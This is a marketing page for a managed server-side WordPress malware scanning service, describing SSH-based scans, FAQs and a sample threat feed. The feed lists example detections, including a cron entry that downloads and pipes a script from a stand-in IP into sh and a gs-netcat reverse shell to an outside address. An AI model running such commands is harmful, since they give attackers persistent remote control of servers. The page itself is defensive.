Under attack right now? We’ll call you straight back. Hacked?

01932 593642

The PatientZero platform

Malware detection and removal, from the server up.

PatientZero connects to your server over SSH, deploys its own scan engine and runs forensic scans and malware sweeps across every site. Then it hardens what it finds, and keeps watching.

How it works

Your server. Our engine. Human-verified results.

SSH keyleast privilege · revocable
Scan engine/opt/patient-zero/scan-engine
Findings → Fix → Hardenverified by our team

Modules

Five capabilities. One loop.

Monitor, detect, clean, harden, report. Each module feeds the next.

Overview

Fleet health, needs-attention queue

Sign up

Connect a server in minutes

Scans

dfir-fast and malware-intelligence across every server

Why server-side

What a plugin sees vs what PatientZero sees.

Security plugins are useful. They just can’t see below WordPress, where persistent malware lives.

CapabilityTypical security pluginPatientZero
Files inside WordPressYesYes
Cron jobs and systemd persistence—NoYes
Other sites on the same server—NoYes
Reverse shells and rogue VPN nodes—NoYes
Rogue system users and SSH keys—NoYes
Keeps working if WordPress is compromised—NoYes
Forensic timeline of the attack—NoYes
Human-verified clean-up included—NoYes

More detail: Security plugin vs server-side malware scanning.

patientzero · live threat feedExample detections
  1. ▲ CRITICALwebshell detected/wp-content/uploads/2026/08/.cache.phpALFA kit
  2. ✓ QUARANTINEDevidence hashedsha256:9f2c…e41avault/0192
  3. ▲ CRITICALcrontab persistence*/1 * * * * curl -s hxxp://203.0.113.24/x | shuser www-data
  4. ✓ REMOVEDcron entry + payload/tmp/.x/kworkerdverified
  5. ▲ HIGHrogue admin accountwp_users: wp_support_admincreated 03:14
  6. ● WARNINGoutdated plugincontact-form-builder 2.1.4update available
  7. ▲ CRITICALreverse shell listenergs-netcat → 198.51.100.7gsocket
  8. ✓ HARDENEDPHP execution disabled/wp-content/uploads/playbook uploads-noexec
  9. ▲ HIGHinjected JS redirectwp-includes/js/jquery/jquery.min.jsoff-domain hop
  10. ✓ RESTOREDWordPress core checksums34 sitesmatch wordpress.org
  11. ▲ CRITICALSEO spam doorway pages/wp-content/themes/twenty/sx/*.html2,047 files
  12. ✓ CLEANmalware sweep completeacme-prod-010 findings

FAQs

Frequently asked questions

Straight answers. If yours isn’t here, call 01932 593642.

How does PatientZero connect to my server?

Over SSH using a key you control. PatientZero deploys its scan engine to /opt/patient-zero/scan-engine on the server, runs scans locally, and you can revoke the key at any time.

Is this a WordPress plugin?

No. Plugins run inside WordPress and can be disabled or fooled by the malware they are looking for. PatientZero scans from the server itself, so it sees cron jobs, system users, other sites and files outside WordPress.

Does it scan every site on the server?

Yes. Forensic scans and malware sweeps run across every site the server user can see, because one infected site can re-infect the rest.

Is the platform self-serve?

PatientZero is delivered as a managed service: our team runs the platform, verifies every finding and performs clean-ups. Book a demo to see it on a real server.

Find patient zero before attackers find the next one.

Get protected with unlimited malware removal, 24/7 monitoring and hardening, or get emergency help right now.

Get protected

or call 01932 593642

Get protected

Incident line

Under attack? We’ll call you straight back.

Leave three details and our incident team is alerted immediately. Or call now on 01932 593642.

Never send passwords here. We’ll arrange secure access with you.